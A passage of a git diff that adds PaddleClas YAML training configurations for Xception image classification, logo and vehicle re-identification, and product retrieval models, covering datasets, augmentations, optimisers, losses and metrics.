RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml new file mode 100644 index 0000000..a580fd3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception41_deeplab.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception41_deeplab + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml new file mode 100644 index 0000000..c94b285 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception65 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml new file mode 100644 index 0000000..bba5cee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception65_deeplab.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception65_deeplab + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml new file mode 100644 index 0000000..bda7ecf --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Xception/Xception71.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Xception71 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0225 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml b/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml new file mode 100644 index 0000000..fa52193 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Logo/ResNet50_ReID.yaml @@ -0,0 +1,151 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "CircleMargin" + margin: 0.35 + scale: 64 + embedding_size: 512 + class_num: 3000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - PairwiseCosface: + margin: 0.35 + gamma: 64 + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/train/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+train.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sampler: + name: PKSampler + batch_size: 128 + sample_per_id: 2 + drop_last: True + + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/val/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+val.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + + Gallery: + dataset: + name: LogoDataset + image_root: "dataset/LogoDet-3K-crop/train/" + cls_label_path: "dataset/LogoDet-3K-crop/LogoDet-3K+train.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml new file mode 100644 index 0000000..c9a8b7b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/MV3_Large_1x_Aliproduct_DLBHC.yaml @@ -0,0 +1,149 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output_dlbhc/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + #eval_mode: "retrieval" + print_batch_step: 10 + use_visualdl: False + + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + + #feature postprocess + feature_normalize: False + feature_binarize: "round" + +# model architecture +Arch: + name: "RecModel" + Backbone: + name: "MobileNetV3_large_x1_0" + pretrained: True + class_num: 512 + Head: + name: "FC" + class_num: 50030 + embedding_size: 512 + + infer_output_key: "features" + infer_add_softmax: "false" + +# loss function config for train/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [50, 150] + values: [0.1, 0.01, 0.001] + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 256 + - RandCropImage: + size: 227 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 227 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 227 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + +# switch to metric below when eval by retrieval +# - Recallk: +# topk: [1] +# - mAP: +# - Precisionk: +# topk: [1] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml new file mode 100644 index 0000000..1210870 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml @@ -0,0 +1,119 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: classification + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: ResNet50_vd + pretrained: True + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: FC + embedding_size: 512 + class_num: 50030 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.05 + regularizer: + name: 'L2' + coeff: 0.00007 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml new file mode 100644 index 0000000..2571ea4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml @@ -0,0 +1,157 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/product_ResNet50_vd_Aliproduct_v1.0_pretrained.pdparams" + output_dir: ./output/ + device: gpu + save_interval: 10 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: ResNet50_vd + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 3997 + margin: 0.15 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.04 + milestones: [30, 60, 70, 80, 90, 100] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + sampler: + name: PKSampler + batch_size: 64 + sample_per_id: 2 + drop_last: True + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/query_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/gallery_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml new file mode 100644 index 0000000..484b6ff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml @@ -0,0 +1,156 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/product_ResNet50_vd_Aliproduct_v1.0_pretrained.pdparams" + output_dir: ./output/ + device: gpu + save_interval: 10 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + Backbone: + name: ResNet50_vd + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 11319 + margin: 0.15 + scale: 30 + infer_output_key: features + infer_add_softmax: False + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.01 + milestones: [30, 60, 70, 80, 90, 100] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml new file mode 100644 index 0000000..6994789 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml new file mode 100644 index 0000000..6aebcbf --- 